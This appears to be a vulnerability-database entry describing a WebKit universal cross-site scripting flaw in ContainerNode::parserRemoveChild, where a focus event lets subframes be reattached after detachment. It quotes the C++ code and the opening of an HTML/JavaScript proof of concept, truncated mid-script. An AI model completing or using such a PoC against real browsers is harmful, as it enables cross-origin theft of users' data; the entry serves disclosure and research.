WebKit: UXSS via...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Here's a snippet of ContainerNode::parserRemoveChild. ``` void ContainerNode::parserRemoveChild(Node& oldChild) { disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a) ... document().notifyRemovePendingSheetIfNeeded(); <<---- (b) } ``` subframes are detached at (a). But In |notifyRemovePendingSheetIfNeeded| at (b), which fires a focus event, we can attach subframes again. ### PoC: ``` <html> <head> </head> <body> <script> let xml = ` <body> <div> <b> <p> <script> let p = document.querySelector('p'); let link = p.appendChild(document.createElement('link')); link.rel = 'stylesheet'; link.href = 'data:,aaaaazxczxczzxzcz'; let btn = document.body.appendChild(document.createElement('button')); btn.id = 'btn'; btn.onfocus = () => { btn.onfocus = null; window.d = document.querySelector('div'); window.d.remove(); link.remove(); document.body.appendChild(p); let m = p.appendChild(document.createElement('iframe')); setTimeout(() => { document.documentElement.innerHTML = '';...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息